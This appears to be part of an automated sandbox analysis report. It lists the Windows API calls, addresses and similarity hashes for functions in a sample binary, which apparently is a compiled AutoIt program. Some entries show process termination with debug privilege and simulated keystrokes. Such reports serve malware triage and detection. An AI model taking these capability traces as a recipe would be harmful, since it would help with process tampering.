                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: 1bda1f2f388b2fe1c86a220be16da1cfadf830ad3744f038bb9797a9d10864fb
                                                                                                                • Instruction ID: af1ce913b250fd3684f049a0fb4f4dea64ed7587d21b9ee661c1dbe3c5ce97ce
                                                                                                                • Opcode Fuzzy Hash: 1bda1f2f388b2fe1c86a220be16da1cfadf830ad3744f038bb9797a9d10864fb
                                                                                                                • Instruction Fuzzy Hash: 0D51C470614244BFDF209B28DC89FAE7BA8FB05350F604715FA21E71A0CFB5A980DB51
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0091C2F7
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0091C319
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0091C331
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0091C34F
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0091C370
                                                                                                                • DestroyIcon.USER32(00000000), ref: 0091C37F
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0091C39C
                                                                                                                • DestroyIcon.USER32(?), ref: 0091C3AB
                                                                                                                  • Part of subcall function 0096A4AF: DeleteObject.GDI32(00000000), ref: 0096A4E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 2819616528-0
                                                                                                                • Opcode ID: 38fd787936b8be8414a9fbeef906d9f0fd78673916c98d7319b69de4d1d194f2
                                                                                                                • Instruction ID: 35d6c8b638291024f42b087654e3ed93f35d2cffa7c151d058870ee5d89235b4
                                                                                                                • Opcode Fuzzy Hash: 38fd787936b8be8414a9fbeef906d9f0fd78673916c98d7319b69de4d1d194f2
                                                                                                                • Instruction Fuzzy Hash: 56516A70654249EFDB20DF69DC45FAA37A9FB45320F104528F912E72A0DBB0ED91EB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0093A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0093A84C
                                                                                                                  • Part of subcall function 0093A82C: GetCurrentThreadId.KERNEL32 ref: 0093A853
                                                                                                                  • Part of subcall function 0093A82C: AttachThreadInput.USER32(00000000,?,00939683,?,00000001), ref: 0093A85A
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0093968E
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009396AB
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009396AE
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 009396B7
                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009396D5
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009396D8
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 009396E1
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009396F8
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009396FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: 2a7d283a9c56b29054189bb3f7959504ae60bb552a94bb01554e3a42f3a2e525
                                                                                                                • Instruction ID: 7585127eacb54eac4381e6df19c4e5a41f1c5086660cfc229f2c502693344988
                                                                                                                • Opcode Fuzzy Hash: 2a7d283a9c56b29054189bb3f7959504ae60bb552a94bb01554e3a42f3a2e525
                                                                                                                • Instruction Fuzzy Hash: FC11E571924218BEF7106F60EC4AF6A3B1DDB4C794F110429F244AB0A0C9F35C10EAA4
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0093853C,00000B00,?,?), ref: 0093892A
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0093853C,00000B00,?,?), ref: 00938931
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0093853C,00000B00,?,?), ref: 00938946
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0093853C,00000B00,?,?), ref: 0093894E
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0093853C,00000B00,?,?), ref: 00938951
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0093853C,00000B00,?,?), ref: 00938961
                                                                                                                • GetCurrentProcess.KERNEL32(0093853C,00000000,?,0093853C,00000B00,?,?), ref: 00938969
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0093853C,00000B00,?,?), ref: 0093896C
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00938992,00000000,00000000,00000000), ref: 00938986
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1957940570-0
                                                                                                                • Opcode ID: 28bfbe24c8b74b5a265a26c5a73d441dbe49ff23b91a84750d5db945e590cf0c
                                                                                                                • Instruction ID: 58ef7053ee8553dfd6260ccee20be03811bb3fd2a2cf38218e19ca7bdfa54216
                                                                                                                • Opcode Fuzzy Hash: 28bfbe24c8b74b5a265a26c5a73d441dbe49ff23b91a84750d5db945e590cf0c
                                                                                                                • Instruction Fuzzy Hash: 3601BF75258304FFE710ABA5ED5DF673B6CEB89751F414425FA05DB191CAB19800DB20
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                • Opcode ID: 4e17418ef7e7248a9aff71b13df9f046db02db51f39576f24a3c9531c1d6270c
                                                                                                                • Instruction ID: 51c26c5d125bf2f9e9284ce7c5eaa0480f87f1a39117d730f2041c36739b3850
                                                                                                                • Opcode Fuzzy Hash: 4e17418ef7e7248a9aff71b13df9f046db02db51f39576f24a3c9531c1d6270c
                                                                                                                • Instruction Fuzzy Hash: 7AC19371A00209DFEF10DF99D885BAEB7F9FB88315F148469ED49AB280E7709D49CB50
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$_memset
                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                • API String ID: 2862541840-625585964
                                                                                                                • Opcode ID: 8fd3e8a763b97533be93dbd282efdab666494dc705a9b007206674537b0b3dfb
                                                                                                                • Instruction ID: c8493e81d38d2e8278fa897a0464669e69cf59503d143b1390e650634c66dcf7
                                                                                                                • Opcode Fuzzy Hash: 8fd3e8a763b97533be93dbd282efdab666494dc705a9b007206674537b0b3dfb
                                                                                                                • Instruction Fuzzy Hash: 1191A471A00215EBEF20DFA6C848FAFB7B8EF45715F108559F915AB280D7709949CBA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0093710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?,?,00937455), ref: 00937127
                                                                                                                  • Part of subcall function 0093710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937142
                                                                                                                  • Part of subcall function 0093710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937150
                                                                                                                  • Part of subcall function 0093710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?), ref: 00937160
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00959806
                                                                                                                • _memset.LIBCMT ref: 00959813
                                                                                                                • _memset.LIBCMT ref: 00959956
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00959982
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0095998D
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 009599DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                • Opcode ID: 60583d4d7b7189928c8dcfc8c8795bf918110319304cdbd3380dfb959c3b057f
                                                                                                                • Instruction ID: fe4344e6ed648aadf75f1b8a0fa52a373ee74425bb6076b7dbf871f8de50cc04
                                                                                                                • Opcode Fuzzy Hash: 60583d4d7b7189928c8dcfc8c8795bf918110319304cdbd3380dfb959c3b057f
                                                                                                                • Instruction Fuzzy Hash: 0C912671D00228EBDB10DFA6DC45EDEBBB9FF49310F10415AE819A7291EB719A44CFA1
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00966E24
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00966E38
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00966E52
                                                                                                                • _wcscat.LIBCMT ref: 00966EAD
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00966EC4
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00966EF2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 307300125-78025650
                                                                                                                • Opcode ID: f36c3c2228fc9219d20f2edbb6e73583770ad93e9fdf165460aa32c0bf17245c
                                                                                                                • Instruction ID: 62e7a3ca98c6e61ca362b1b0578000566fa064ef15a53268dcc27aeb7eec7832
                                                                                                                • Opcode Fuzzy Hash: f36c3c2228fc9219d20f2edbb6e73583770ad93e9fdf165460aa32c0bf17245c
                                                                                                                • Instruction Fuzzy Hash: 4C419E71A00348AFEF219F64CC89BEEB7E8EF48354F10042AF595E72D1D6729D948B60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00943C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00943C7A
                                                                                                                  • Part of subcall function 00943C55: Process32FirstW.KERNEL32(00000000,?), ref: 00943C88
                                                                                                                  • Part of subcall function 00943C55: CloseHandle.KERNEL32(00000000), ref: 00943D52
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095E9A4
                                                                                                                • GetLastError.KERNEL32 ref: 0095E9B7
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095E9E6
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0095EA63
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 0095EA6E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0095EAA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                • Opcode ID: 033e9cc24108fd2d4863c42cc27ab1f7ee7812905643d76ee4f3d6a88bf45241
                                                                                                                • Instruction ID: 952fa533444519dd3f480d926bbcf2d86835eaf7eebfda37d30f736ae48431ea
                                                                                                                • Opcode Fuzzy Hash: 033e9cc24108fd2d4863c42cc27ab1f7ee7812905643d76ee4f3d6a88bf45241
                                                                                                                • Instruction Fuzzy Hash: CF41A2712042009FDB14EF29DCA5F6DB7A5FF81314F04841CF9469B2D2CBB5A908CB52
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00943033
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: 204a5c66f30c4b840b91b407916f77a31c48c0d54ab6b32a23e90f6602270a8e
                                                                                                                • Instruction ID: de03dc652ae6af6e5d70b064e9508d3830f78ea8342db84e3e28ec16d1bc8d94
                                                                                                                • Opcode Fuzzy Hash: 204a5c66f30c4b840b91b407916f77a31c48c0d54ab6b32a23e90f6602270a8e
                                                                                                                • Instruction Fuzzy Hash: AF115C3138C346BEEB249B28DC42D6B779CDF16324B20456EF900A61C2EFB55F4456A1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00944312
                                                                                                                • LoadStringW.USER32(00000000), ref: 00944319
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0094432F
                                                                                                                • LoadStringW.USER32(00000000), ref: 00944336
                                                                                                                • _wprintf.LIBCMT ref: 0094435C
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094437A
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00944357
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                • Opcode ID: 1ef84a3f313a62052daae6901dd72e26f4f2a439e73724684c45c30704d6719e
                                                                                                                • Instruction ID: 5d5acdf666603905cb14c4cbd82697a8cc1c199cad2adfb94fe5492fa1ea789f
                                                                                                                • Opcode Fuzzy Hash: 1ef84a3f313a62052daae6901dd72e26f4f2a439e73724684c45c30704d6719e
                                                                                                                • Instruction Fuzzy Hash: 160144F290820CBFE7119B94ED89FE6776CE708740F0005A5F745E6051EAB45E855B71
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0096D47C
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0096D49C
                                                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0096D6D7
                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0096D6F5
                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0096D716
                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 0096D735
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0096D75A
                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0096D77D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1211466189-0
                                                                                                                • Opcode ID: 0a00a68481a90842a1d05d6bbd7142b58a28bc1f14f0a60a8fa99b760ae13456
                                                                                                                • Instruction ID: cc3ed2341dcf331713ec805c51166fbde477902fc48509114e6bff10fb0f47ab
                                                                                                                • Opcode Fuzzy Hash: 0a00a68481a90842a1d05d6bbd7142b58a28bc1f14f0a60a8fa99b760ae13456
                                                                                                                • Instruction Fuzzy Hash: 14B1BA70A01229EFDF14CF68C9C47AD3BB5FF04700F098069EC689B299D774AA50CBA0
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000), ref: 008E2ACF
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 008E2B17
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000), ref: 0091C21A
                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0091C1C7,00000004,00000000,00000000,00000000), ref: 0091C286
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 52c5e24459299e38120ce571adb6a0c2c093fcd0d43896a202d668306f5a971b
                                                                                                                • Instruction ID: d70780b48fe22634c37b32f6cedfc5b9854ebf84d0d18d855ac3ce34ed9bd687
                                                                                                                • Opcode Fuzzy Hash: 52c5e24459299e38120ce571adb6a0c2c093fcd0d43896a202d668306f5a971b
                                                                                                                • Instruction Fuzzy Hash: 2341F5313186D8ABC7358B2ADC98BAE7B9AFB87314F58883EE057C2560C675D8C1D711
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 009470DD
                                                                                                                  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00947114
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00947130
                                                                                                                • _memmove.LIBCMT ref: 0094717E
                                                                                                                • _memmove.LIBCMT ref: 0094719B
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009471AA
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009471BF
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 009471DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 256516436-0
                                                                                                                • Opcode ID: 1fede4fdf2663814b49ebbd8231f3fba2b393af044cf3ac6d41d3213ef925344
                                                                                                                • Instruction ID: 7327ea0432071c47848b20d827da4d6414f00c4672c9bed5f47464c2abbb222b
                                                                                                                • Opcode Fuzzy Hash: 1fede4fdf2663814b49ebbd8231f3fba2b393af044cf3ac6d41d3213ef925344
                                                                                                                • Instruction Fuzzy Hash: A0316D31904209EFCB00DFA4DD85AAEB779FF89310F1441A9F904AB296DB709A10DBA0
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 009661EB
